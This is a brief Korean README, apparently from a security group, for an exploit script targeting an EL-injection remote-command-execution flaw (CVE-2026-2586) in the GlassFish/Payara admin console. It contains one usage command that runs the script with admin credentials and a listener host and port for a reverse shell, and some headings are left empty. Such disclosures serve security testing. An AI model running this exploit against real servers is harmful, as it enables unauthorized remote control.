
인증된 GlassFish/Payara 관리 콘솔용 EL 주입 익스플로잇으로, 가상 서버 구성 흐름에서 조작된 파라미터를 통해 원격 명령 실행을 가능하게 합니다.
GlassFish 관리 콘솔의 Expression Language 주입 취약점으로 인해 인증된 사용자가 관리 웹 인터페이스에서 처리되는 매개변수에 악성 EL 표현식을 주입할 수 있습니다. 성공적으로 악용하면 영향을 받는 서버에서 원격 명령 실행이 발생할 수 있습니다.
이 취약점은 서버 가상 구성 편집 흐름에서 발견되었으며, 여기서 사용자가 제어할 수 있는 매개변수가 애플리케이션에 의해 안전하지 않게 해석됩니다.
이는 다음 이유로 발생합니다:
테스트는 로컬 및 통제된 환경에서 수행되었습니다.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
취약한 URL:
승인된 사용만 허용됩니다. DeepSecurity Perú는 무단 접근을 승인하지 않으며 제공된 정보의 오용에 대해 어떠한 책임도 지지 않습니다.